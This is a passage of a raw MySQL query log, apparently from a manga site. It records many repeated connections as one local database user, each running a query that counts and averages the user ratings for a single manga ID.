using Socket 330646076 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330646076 Quit 330646077 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646077 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330646077 Quit 330646078 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646078 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330646078 Quit 330646079 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646079 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330646079 Quit 330646080 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646080 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330646080 Quit 330646081 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646081 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330646081 Quit 330646082 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646082 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330646082 Quit 330646083 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646083 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330646083 Quit 330646084 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646084 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330646084 Quit 330646085 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646085 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330646085 Quit 330646086 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646086 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330646086 Quit 330646087 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646087 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330646087 Quit 330646088 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646088 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330646088 Quit 330646089 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646089 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330646089 Quit 330646090 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646090 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330646090 Quit 330646091 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646091 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330646091 Quit 330646092 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646092 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330646092 Quit 330646093 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646093 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330646093 Quit 330646094 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646094 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330646094 Quit 330646095 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646095 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330646095 Quit 330646096 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646096 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330646096 Quit 330646097 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646097 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330646097 Quit 330646098 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646098 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330646098 Quit 330646099 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646099 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330646099 Quit 330646100 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646100 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330646100 Quit 330646101 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646101 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330646101 Quit 330646102 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646102 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330646102 Quit 330646103 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646103 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330646103 Quit 330646104 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646104 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330646104 Quit 330646105 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646105 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330646105 Quit 330646106 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646106 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330646106 Quit 330646107 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646107 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330646107 Quit 330646108 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646108 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330646108 Quit 330646109 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646109 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330646109 Quit 330646110 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646110 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330646110 Quit 330646111 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646111 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330646111 Quit 330646112 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646112 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330646112 Quit 330646113 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646113 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330646113 Quit 330646114 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646114 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330646114 Quit 330646115 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646115 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330646115 Quit 330646116 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646116 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330646116 Quit 330646117 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646117 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330646117 Quit 330646118 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646118 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330646118 Quit 330646119 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646119 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330646119 Quit 330646120 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646120 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330646120 Quit 330646121 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646121 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330646121 Quit 330646122 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646122 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330646122 Quit 330646123 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646123 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330646123 Quit 330646124 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646124 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330646124 Quit 330646125 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646125 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330646125 Quit 330646126 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646126 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330646126 Quit 330646127 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646127 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330646127 Quit 330646128 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646128 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330646128 Quit 330646129 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646129 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330646129 Quit 330646130 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646130 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330646130 Quit 330646131 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646131 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330646131 Quit 330646132 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646132 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330646132 Quit 330646133 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646133 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330646133 Quit 330646134 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646134 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330646134 Quit 330646135 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646135 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330646135 Quit 330646136 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646136 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330646136 Quit 330646137 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646137 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330646137 Quit 330646138 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646138 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330646138 Quit 330646139 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646139 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330646139 Quit 330646140 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646140 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330646140 Quit 330646141 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646141 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330646141 Quit 330646142 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646142 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330646142 Quit 330646143 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646143 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330646143 Quit 330646144 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646144 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330646144 Quit 330646145 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646145 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330646145 Quit 330646146 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646146 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330646146 Quit 330646147 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646147 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330646147 Quit 330646148 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646148 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330646148 Quit 330646149 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646149 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330646149 Quit 330646150 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646150 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330646150 Quit 330646151 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646151 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330646151 Quit 330646152 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646152 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330646152 Quit 330646153 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646153 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330646153 Quit 330646154 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646154 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330646154 Quit 330646155 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646155 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330646155 Quit 330646156 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646156 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330646156 Quit 330646157 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646157 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330646157 Quit 330646158 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646158 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330646158 Quit 330646159 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646159 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330646159 Quit 330646160 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646160 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330646160 Quit 330646161 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646161 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330646161 Quit 330646162 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646162 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330646162 Quit 330646163 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646163 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330646163 Quit 330646164 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646164 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330646164 Quit 330646165 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646165 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330646165 Quit 330646166 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646166 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330646166 Quit 330646167 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646167 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330646167 Quit 330646168 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646168 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330646168 Quit 330646169 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646169 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330646169 Quit 330646170 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646170 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330646170 Quit 330646171 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646171 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330646171 Quit 330646172 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646172 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330646172 Quit 330646173 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646173 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330646173 Quit 330646174 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646174 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330646174 Quit 330646175 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646175 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330646175 Quit 330646176 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646176 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330646176 Quit 330646177 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646177 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330646177 Quit 330646178 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646178 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330646178 Quit 330646179 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646179 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330646179 Quit 330646180 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646180 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330646180 Quit 330646181 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646181 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330646181 Quit 330646182 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646182 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330646182 Quit 330646183 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646183 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330646183 Quit 330646184 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646184 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330646184 Quit 330646185 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646185 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330646185 Quit 330646186 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646186 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330646186 Quit 330646187 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646187 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330646187 Quit 330646188 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646188 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330646188 Quit 330646189 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646189 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330646189 Quit 330646190 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646190 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330646190 Quit 330646191 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646191 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330646191 Quit 330646192 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646192 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330646192 Quit 330646193 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646193 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330646193 Quit 330646194 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646194 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330646194 Quit 330646195 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646195 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330646195 Quit 330646196 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646196 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330646196 Quit 330646197 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646197 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330646197 Quit 330646198 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646198 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330646198 Quit 330646199 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646199 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330646199 Quit 330646200 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646200 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330646200 Quit 330646201 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646201 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330646201 Quit 330646202 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646202 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330646202 Quit 330646203 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646203 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330646203 Quit 330646204 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646204 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330646204 Quit 330646205 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646205 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330646205 Quit 330646206 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646206 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330646206 Quit 330646207 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646207 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330646207 Quit 330646208 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646208 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330646208 Quit 330646209 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646209 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330646209 Quit 330646210 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646210 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330646210 Quit 330646211 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646211 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330646211 Quit 330646212 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646212 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330646212 Quit 330646213 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646213 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330646213 Quit 330646214 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646214 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330646214 Quit 330646215 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646215 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330646215 Quit 330646216 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646216 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330646216 Quit 330646217 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646217 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330646217 Quit 330646218 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646218 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330646218 Quit 330646219 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646219 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330646219 Quit 330646220 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646220 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330646220 Quit 330646221 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646221 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330646221 Quit 330646222 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646222 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330646222 Quit 330646223 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646223 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330646223 Quit 330646224 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646224 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330646224 Quit 330646225 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646225 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330646225 Quit 330646226 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646226 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330646226 Quit 330646227 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646227 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330646227 Quit 330646228 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330646228 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330646228 Quit 330646229 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 